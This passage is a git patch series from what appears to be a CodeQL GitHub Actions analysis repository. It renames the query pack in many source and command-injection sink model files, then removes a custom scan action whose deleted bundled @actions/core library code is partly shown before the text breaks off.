- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSourceModel
 data:
 - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"]
diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml
index 014e779b29a0..a534e3dfcf75 100644
--- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml
+++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"]
diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
index 806c055529df..dfaa2e2687db 100644
--- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml
+++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"]
diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml
index d6e554a87092..f87beb15018c 100644
--- a/ql/lib/ext/tzkhan_pr-update-action.model.yml
+++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSourceModel
 data:
 - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"]
diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml
index 55d1531a7707..59cc155b5507 100644
--- a/ql/lib/ext/veracode_veracode-sca.model.yml
+++ b/ql/lib/ext/veracode_veracode-sca.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"]
diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml
index c52d62e204a4..52dcff39903b 100644
--- a/ql/lib/ext/wearerequired_lint-action.model.yml
+++ b/ql/lib/ext/wearerequired_lint-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"]
diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml
index 1e915194d96e..f9e122c17a9c 100644
--- a/ql/lib/ext/webfactory_ssh-agent.model.yml
+++ b/ql/lib/ext/webfactory_ssh-agent.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"]
diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml
index ff02589fb844..1f0401e8e616 100644
--- a/ql/lib/ext/workflow-models/workflow-models.yml
+++ b/ql/lib/ext/workflow-models/workflow-models.yml
@@ -1,14 +1,14 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: repositoryDataModel
 data: []
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: workflowDataModel
 data: []
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: contextTriggerDataModel
 data:
 - ["commit_comment", "github.event.comment"]
@@ -55,7 +55,7 @@ extensions:
 - ["workflow_call", "github.event.workflow"]
 - ["workflow_call", "github.event.workflow_run"]
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: externallyTriggerableEventsDataModel
 data:
 - ["discussion"]
diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml
index 1cc360c472d2..0910261d21d6 100644
--- a/ql/lib/ext/xt0rted_slash-command-action.model.yml
+++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSourceModel
 data:
 - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"]
diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml
index cb7e0936cca1..91df4767a728 100644
--- a/ql/lib/ext/zaproxy_action-baseline.model.yml
+++ b/ql/lib/ext/zaproxy_action-baseline.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"]
diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml
index 210c3365eda9..57f76c8cb4ab 100644
--- a/ql/lib/ext/zaproxy_action-full-scan.model.yml
+++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"]
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 10d9eeddcf71..70edc1b05745 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: true
 warnOnImplicitThis: true
-name: githubsecuritylab/actions-all
+name: github/actions-all
 version: 0.1.2
 dependencies:
 codeql/util: ^1.0.0
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 16bad7c15bd3..89df5ee87975 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,6 +1,6 @@
 ---
 library: false
-name: githubsecuritylab/actions-queries
+name: github/actions-queries
 version: 0.1.2
 groups: [actions, queries]
 suites: codeql-suites
@@ -8,5 +8,5 @@ extractor: javascript
 dbscheme: semmlecode.javascript.dbscheme
 defaultSuiteFile: codeql-suites/actions-code-scanning.qls
 dependencies:
- githubsecuritylab/actions-all: ${workspace}
+ github/actions-all: ${workspace}
 warnOnImplicitThis: true
diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml
index 1676d742d37e..77e25d8e419c 100644
--- a/ql/test/qlpack.yml
+++ b/ql/test/qlpack.yml
@@ -1,9 +1,9 @@
 ---
-name: githubsecuritylab/actions-tests
+name: github/actions-tests
 groups: [javascript, test]
 dependencies:
- githubsecuritylab/actions-all: ${workspace}
- githubsecuritylab/actions-queries: ${workspace}
+ github/actions-all: ${workspace}
+ github/actions-queries: ${workspace}
 extractor: javascript
 tests: .
 warnOnImplicitThis: true
From 06918b0492705cd23477e966184ad59c7262477f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 21 Jun 2024 09:19:37 +0200
Subject: [PATCH 342/707] Remove custom scan action
---
.github/action/.gitignore | 1 -
.github/action/dist/index.js | 30722 -----------------------
.github/action/dist/licenses.txt | 175 -
.github/action/package-lock.json | 639 -
.github/action/package.json | 48 -
.github/action/src/codeql.ts | 172 -
.github/action/src/index.ts | 61 -
.github/action/tsconfig.json | 24 -
.github/workflows/build.yml | 30 -
.github/workflows/copy-to-bughalla.yml | 34 -
action.yml | 51 -
clean.sh | 2 -
12 files changed, 31959 deletions(-)
delete mode 100644 .github/action/.gitignore
delete mode 100644 .github/action/dist/index.js
delete mode 100644 .github/action/dist/licenses.txt
delete mode 100644 .github/action/package-lock.json
delete mode 100644 .github/action/package.json
delete mode 100644 .github/action/src/codeql.ts
delete mode 100644 .github/action/src/index.ts
delete mode 100644 .github/action/tsconfig.json
delete mode 100644 .github/workflows/build.yml
delete mode 100644 .github/workflows/copy-to-bughalla.yml
delete mode 100644 action.yml
delete mode 100755 clean.sh
diff --git a/.github/action/.gitignore b/.github/action/.gitignore
deleted file mode 100644
index c2658d7d1b31..000000000000
--- a/.github/action/.gitignore
+++ /dev/null
@@ -1 +0,0 @@
-node_modules/
diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js
deleted file mode 100644
index 7281eb9d9b51..000000000000
--- a/.github/action/dist/index.js
+++ /dev/null
@@ -1,30722 +0,0 @@ -/******/ (() => { // webpackBootstrap -/******/ var __webpack_modules__ = ({ - -/***/ 7351: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.issue = exports.issueCommand = void 0; -const os = __importStar(__nccwpck_require__(2037)); -const utils_1 = __nccwpck_require__(5278); -/** - * Commands - * - * Command Format: - * ::name key=value,key=value::message - * - * Examples: - * ::warning::This is the message - * ::set-env name=MY_VAR::some value - */ -function issueCommand(command, properties, message) { - const cmd = new Command(command, properties, message); - process.stdout.write(cmd.toString() + os.EOL); -} -exports.issueCommand = issueCommand; -function issue(name, message = '') { - issueCommand(name, {}, message); -} -exports.issue = issue; -const CMD_STRING = '::'; -class Command { - constructor(command, properties, message) { - if (!command) { - command = 'missing.command'; - } - this.command = command; - this.properties = properties; - this.message = message; - } - toString() { - let cmdStr = 
CMD_STRING + this.command; - if (this.properties && Object.keys(this.properties).length > 0) { - cmdStr += ' '; - let first = true; - for (const key in this.properties) { - if (this.properties.hasOwnProperty(key)) { - const val = this.properties[key]; - if (val) { - if (first) { - first = false; - } - else { - cmdStr += ','; - } - cmdStr += `${key}=${escapeProperty(val)}`; - } - } - } - } - cmdStr += `${CMD_STRING}${escapeData(this.message)}`; - return cmdStr; - } -} -function escapeData(s) { - return utils_1.toCommandValue(s) - .replace(/%/g, '%25') - .replace(/\r/g, '%0D') - .replace(/\n/g, '%0A'); -} -function escapeProperty(s) { - return utils_1.toCommandValue(s) - .replace(/%/g, '%25') - .replace(/\r/g, '%0D') - .replace(/\n/g, '%0A') - .replace(/:/g, '%3A') - .replace(/,/g, '%2C'); -} -//# sourceMappingURL=command.js.map - -/***/ }), - -/***/ 2186: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.getIDToken = exports.getState = exports.saveState = exports.group = exports.endGroup = exports.startGroup = exports.info = exports.notice = exports.warning = exports.error = exports.debug = exports.isDebug = exports.setFailed = exports.setCommandEcho = exports.setOutput = exports.getBooleanInput = exports.getMultilineInput = exports.getInput = exports.addPath = exports.setSecret = exports.exportVariable = exports.ExitCode = void 0; -const command_1 = __nccwpck_require__(7351); -const file_command_1 = __nccwpck_require__(717); -const utils_1 = __nccwpck_require__(5278); -const os = __importStar(__nccwpck_require__(2037)); -const path = __importStar(__nccwpck_require__(1017)); -const oidc_utils_1 = __nccwpck_require__(8041); -/** - * The code to exit an action - */ -var ExitCode; -(function (ExitCode) { - /** - * A code indicating that the action was successful - */ - ExitCode[ExitCode["Success"] = 0] = "Success"; - /** - * A code indicating that the action was a failure - */ - ExitCode[ExitCode["Failure"] = 1] = "Failure"; -})(ExitCode = exports.ExitCode || (exports.ExitCode = {})); -//----------------------------------------------------------------------- -// Variables -//----------------------------------------------------------------------- -/** - * Sets env variable for this action and future actions in the job - * @param name the name of the variable to set - * @param val the value of the 
variable. Non-string values will be converted to a string via JSON.stringify - */ -// eslint-disable-next-line @typescript-eslint/no-explicit-any -function exportVariable(name, val) { - const convertedVal = utils_1.toCommandValue(val); - process.env[name] = convertedVal; - const filePath = process.env['GITHUB_ENV'] || ''; - if (filePath) { - return file_command_1.issueFileCommand('ENV', file_command_1.prepareKeyValueMessage(name, val)); - } - command_1.issueCommand('set-env', { name }, convertedVal); -} -exports.exportVariable = exportVariable; -/** - * Registers a secret which will get masked from logs - * @param secret value of the secret - */ -function setSecret(secret) { - command_1.issueCommand('add-mask', {}, secret); -} -exports.setSecret = setSecret; -/** - * Prepends inputPath to the PATH (for this action and future actions) - * @param inputPath - */ -function addPath(inputPath) { - const filePath = process.env['GITHUB_PATH'] || ''; - if (filePath) { - file_command_1.issueFileCommand('PATH', inputPath); - } - else { - command_1.issueCommand('add-path', {}, inputPath); - } - process.env['PATH'] = `${inputPath}${path.delimiter}${process.env['PATH']}`; -} -exports.addPath = addPath; -/** - * Gets the value of an input. - * Unless trimWhitespace is set to false in InputOptions, the value is also trimmed. - * Returns an empty string if the value is not defined. - * - * @param name name of the input to get - * @param options optional. See InputOptions. - * @returns string - */ -function getInput(name, options) { - const val = process.env[`INPUT_${name.replace(/ /g, '_').toUpperCase()}`] || ''; - if (options && options.required && !val) { - throw new Error(`Input required and not supplied: ${name}`); - } - if (options && options.trimWhitespace === false) { - return val; - } - return val.trim(); -} -exports.getInput = getInput; -/** - * Gets the values of an multiline input. Each value is also trimmed. 
- * - * @param name name of the input to get - * @param options optional. See InputOptions. - * @returns string[] - * - */ -function getMultilineInput(name, options) { - const inputs = getInput(name, options) - .split('\n') - .filter(x => x !== ''); - if (options && options.trimWhitespace === false) { - return inputs; - } - return inputs.map(input => input.trim()); -} -exports.getMultilineInput = getMultilineInput; -/** - * Gets the input value of the boolean type in the YAML 1.2 "core schema" specification. - * Support boolean input list: `true | True | TRUE | false | False | FALSE` . - * The return value is also in boolean type. - * ref: https://yaml.org/spec/1.2/spec.html#id2804923 - * - * @param name name of the input to get - * @param options optional. See InputOptions. - * @returns boolean - */ -function getBooleanInput(name, options) { - const trueValue = ['true', 'True', 'TRUE']; - const falseValue = ['false', 'False', 'FALSE']; - const val = getInput(name, options); - if (trueValue.includes(val)) - return true; - if (falseValue.includes(val)) - return false; - throw new TypeError(`Input does not meet YAML 1.2 "Core Schema" specification: ${name}\n` + - `Support boolean input list: \`true | True | TRUE | false | False | FALSE\``); -} -exports.getBooleanInput = getBooleanInput; -/** - * Sets the value of an output. - * - * @param name name of the output to set - * @param value value to store. 
Non-string values will be converted to a string via JSON.stringify - */ -// eslint-disable-next-line @typescript-eslint/no-explicit-any -function setOutput(name, value) { - const filePath = process.env['GITHUB_OUTPUT'] || ''; - if (filePath) { - return file_command_1.issueFileCommand('OUTPUT', file_command_1.prepareKeyValueMessage(name, value)); - } - process.stdout.write(os.EOL); - command_1.issueCommand('set-output', { name }, utils_1.toCommandValue(value)); -} -exports.setOutput = setOutput; -/** - * Enables or disables the echoing of commands into stdout for the rest of the step. - * Echoing is disabled by default if ACTIONS_STEP_DEBUG is not set. - * - */ -function setCommandEcho(enabled) { - command_1.issue('echo', enabled ? 'on' : 'off'); -} -exports.setCommandEcho = setCommandEcho; -//----------------------------------------------------------------------- -// Results -//----------------------------------------------------------------------- -/** - * Sets the action status to failed. - * When the action exits it will be with an exit code of 1 - * @param message add error issue message - */ -function setFailed(message) { - process.exitCode = ExitCode.Failure; - error(message); -} -exports.setFailed = setFailed; -//----------------------------------------------------------------------- -// Logging Commands -//----------------------------------------------------------------------- -/** - * Gets whether Actions Step Debug is on or not - */ -function isDebug() { - return process.env['RUNNER_DEBUG'] === '1'; -} -exports.isDebug = isDebug; -/** - * Writes debug message to user log - * @param message debug message - */ -function debug(message) { - command_1.issueCommand('debug', {}, message); -} -exports.debug = debug; -/** - * Adds an error issue - * @param message error issue message. Errors will be converted to string via toString() - * @param properties optional properties to add to the annotation. 
- */ -function error(message, properties = {}) { - command_1.issueCommand('error', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); -} -exports.error = error; -/** - * Adds a warning issue - * @param message warning issue message. Errors will be converted to string via toString() - * @param properties optional properties to add to the annotation. - */ -function warning(message, properties = {}) { - command_1.issueCommand('warning', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); -} -exports.warning = warning; -/** - * Adds a notice issue - * @param message notice issue message. Errors will be converted to string via toString() - * @param properties optional properties to add to the annotation. - */ -function notice(message, properties = {}) { - command_1.issueCommand('notice', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); -} -exports.notice = notice; -/** - * Writes info to log with console.log. - * @param message info message - */ -function info(message) { - process.stdout.write(message + os.EOL); -} -exports.info = info; -/** - * Begin an output group. - * - * Output until the next `groupEnd` will be foldable in this group - * - * @param name The name of the output group - */ -function startGroup(name) { - command_1.issue('group', name); -} -exports.startGroup = startGroup; -/** - * End an output group. - */ -function endGroup() { - command_1.issue('endgroup'); -} -exports.endGroup = endGroup; -/** - * Wrap an asynchronous function call in a group. - * - * Returns the same type as the function itself. 
- * - * @param name The name of the group - * @param fn The function to wrap in the group - */ -function group(name, fn) { - return __awaiter(this, void 0, void 0, function* () { - startGroup(name); - let result; - try { - result = yield fn(); - } - finally { - endGroup(); - } - return result; - }); -} -exports.group = group; -//----------------------------------------------------------------------- -// Wrapper action state -//----------------------------------------------------------------------- -/** - * Saves state for current action, the state can only be retrieved by this action's post job execution. - * - * @param name name of the state to store - * @param value value to store. Non-string values will be converted to a string via JSON.stringify - */ -// eslint-disable-next-line @typescript-eslint/no-explicit-any -function saveState(name, value) { - const filePath = process.env['GITHUB_STATE'] || ''; - if (filePath) { - return file_command_1.issueFileCommand('STATE', file_command_1.prepareKeyValueMessage(name, value)); - } - command_1.issueCommand('save-state', { name }, utils_1.toCommandValue(value)); -} -exports.saveState = saveState; -/** - * Gets the value of an state set by this action's main execution. 
- * - * @param name name of the state to get - * @returns string - */ -function getState(name) { - return process.env[`STATE_${name}`] || ''; -} -exports.getState = getState; -function getIDToken(aud) { - return __awaiter(this, void 0, void 0, function* () { - return yield oidc_utils_1.OidcClient.getIDToken(aud); - }); -} -exports.getIDToken = getIDToken; -/** - * Summary exports - */ -var summary_1 = __nccwpck_require__(1327); -Object.defineProperty(exports, "summary", ({ enumerable: true, get: function () { return summary_1.summary; } })); -/** - * @deprecated use core.summary - */ -var summary_2 = __nccwpck_require__(1327); -Object.defineProperty(exports, "markdownSummary", ({ enumerable: true, get: function () { return summary_2.markdownSummary; } })); -/** - * Path exports - */ -var path_utils_1 = __nccwpck_require__(2981); -Object.defineProperty(exports, "toPosixPath", ({ enumerable: true, get: function () { return path_utils_1.toPosixPath; } })); -Object.defineProperty(exports, "toWin32Path", ({ enumerable: true, get: function () { return path_utils_1.toWin32Path; } })); -Object.defineProperty(exports, "toPlatformPath", ({ enumerable: true, get: function () { return path_utils_1.toPlatformPath; } })); -//# sourceMappingURL=core.js.map - -/***/ }), - -/***/ 717: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -// For internal use, subject to change. -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.prepareKeyValueMessage = exports.issueFileCommand = void 0; -// We use any as a valid input type -/* eslint-disable @typescript-eslint/no-explicit-any */ -const fs = __importStar(__nccwpck_require__(7147)); -const os = __importStar(__nccwpck_require__(2037)); -const uuid_1 = __nccwpck_require__(5840); -const utils_1 = __nccwpck_require__(5278); -function issueFileCommand(command, message) { - const filePath = process.env[`GITHUB_${command}`]; - if (!filePath) { - throw new Error(`Unable to find environment variable for file command ${command}`); - } - if (!fs.existsSync(filePath)) { - throw new Error(`Missing file at path: ${filePath}`); - } - fs.appendFileSync(filePath, `${utils_1.toCommandValue(message)}${os.EOL}`, { - encoding: 'utf8' - }); -} -exports.issueFileCommand = issueFileCommand; -function prepareKeyValueMessage(key, value) { - const delimiter = `ghadelimiter_${uuid_1.v4()}`; - const convertedValue = utils_1.toCommandValue(value); - // These should realistically never happen, but just in case someone finds a - // way to exploit uuid generation let's not allow keys or values that contain - // the delimiter. 
- if (key.includes(delimiter)) { - throw new Error(`Unexpected input: name should not contain the delimiter "${delimiter}"`); - } - if (convertedValue.includes(delimiter)) { - throw new Error(`Unexpected input: value should not contain the delimiter "${delimiter}"`); - } - return `${key}<<${delimiter}${os.EOL}${convertedValue}${os.EOL}${delimiter}`; -} -exports.prepareKeyValueMessage = prepareKeyValueMessage; -//# sourceMappingURL=file-command.js.map - -/***/ }), - -/***/ 8041: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.OidcClient = void 0; -const http_client_1 = __nccwpck_require__(6255); -const auth_1 = __nccwpck_require__(5526); -const core_1 = __nccwpck_require__(2186); -class OidcClient { - static createHttpClient(allowRetry = true, maxRetry = 10) { - const requestOptions = { - allowRetries: allowRetry, - maxRetries: maxRetry - }; - return new http_client_1.HttpClient('actions/oidc-client', [new auth_1.BearerCredentialHandler(OidcClient.getRequestToken())], requestOptions); - } - static getRequestToken() { - const token = process.env['ACTIONS_ID_TOKEN_REQUEST_TOKEN']; - if (!token) { - throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_TOKEN env variable'); - } - return token; - } - static getIDTokenUrl() { - const runtimeUrl = process.env['ACTIONS_ID_TOKEN_REQUEST_URL']; - if (!runtimeUrl) { - throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_URL env variable'); - } - return runtimeUrl; - } - static getCall(id_token_url) { - var _a; - return __awaiter(this, void 0, void 0, function* () { - const httpclient = OidcClient.createHttpClient(); - const res = yield httpclient - .getJson(id_token_url) - .catch(error => { - throw new Error(`Failed to get ID Token. \n - Error Code : ${error.statusCode}\n - Error Message: ${error.message}`); - }); - const id_token = (_a = res.result) === null || _a === void 0 ? 
void 0 : _a.value; - if (!id_token) { - throw new Error('Response json body do not have ID Token field'); - } - return id_token; - }); - } - static getIDToken(audience) { - return __awaiter(this, void 0, void 0, function* () { - try { - // New ID Token is requested from action service - let id_token_url = OidcClient.getIDTokenUrl(); - if (audience) { - const encodedAudience = encodeURIComponent(audience); - id_token_url = `${id_token_url}&audience=${encodedAudience}`; - } - core_1.debug(`ID token url is ${id_token_url}`); - const id_token = yield OidcClient.getCall(id_token_url); - core_1.setSecret(id_token); - return id_token; - } - catch (error) { - throw new Error(`Error message: ${error.message}`); - } - }); - } -} -exports.OidcClient = OidcClient; -//# sourceMappingURL=oidc-utils.js.map - -/***/ }), - -/***/ 2981: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.toPlatformPath = exports.toWin32Path = exports.toPosixPath = void 0; -const path = __importStar(__nccwpck_require__(1017)); -/** - * toPosixPath converts the given path to the posix form. On Windows, \\ will be - * replaced with /. - * - * @param pth. Path to transform. - * @return string Posix path. - */ -function toPosixPath(pth) { - return pth.replace(/[\\]/g, '/'); -} -exports.toPosixPath = toPosixPath; -/** - * toWin32Path converts the given path to the win32 form. On Linux, / will be - * replaced with \\. - * - * @param pth. Path to transform. - * @return string Win32 path. - */ -function toWin32Path(pth) { - return pth.replace(/[/]/g, '\\'); -} -exports.toWin32Path = toWin32Path; -/** - * toPlatformPath converts the given path to a platform-specific path. It does - * this by replacing instances of / and \ with the platform-specific path - * separator. - * - * @param pth The path to platformize. - * @return string The platform-specific path. - */ -function toPlatformPath(pth) { - return pth.replace(/[/\\]/g, path.sep); -} -exports.toPlatformPath = toPlatformPath; -//# sourceMappingURL=path-utils.js.map - -/***/ }), - -/***/ 1327: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.summary = exports.markdownSummary = exports.SUMMARY_DOCS_URL = exports.SUMMARY_ENV_VAR = void 0; -const os_1 = __nccwpck_require__(2037); -const fs_1 = __nccwpck_require__(7147); -const { access, appendFile, writeFile } = fs_1.promises; -exports.SUMMARY_ENV_VAR = 'GITHUB_STEP_SUMMARY'; -exports.SUMMARY_DOCS_URL = 'https://docs.github.com/actions/using-workflows/workflow-commands-for-github-actions#adding-a-job-summary'; -class Summary { - constructor() { - this._buffer = ''; - } - /** - * Finds the summary file path from the environment, rejects if env var is not found or file does not exist - * Also checks r/w permissions. - * - * @returns step summary file path - */ - filePath() { - return __awaiter(this, void 0, void 0, function* () { - if (this._filePath) { - return this._filePath; - } - const pathFromEnv = process.env[exports.SUMMARY_ENV_VAR]; - if (!pathFromEnv) { - throw new Error(`Unable to find environment variable for $${exports.SUMMARY_ENV_VAR}. Check if your runtime environment supports job summaries.`); - } - try { - yield access(pathFromEnv, fs_1.constants.R_OK | fs_1.constants.W_OK); - } - catch (_a) { - throw new Error(`Unable to access summary file: '${pathFromEnv}'. 
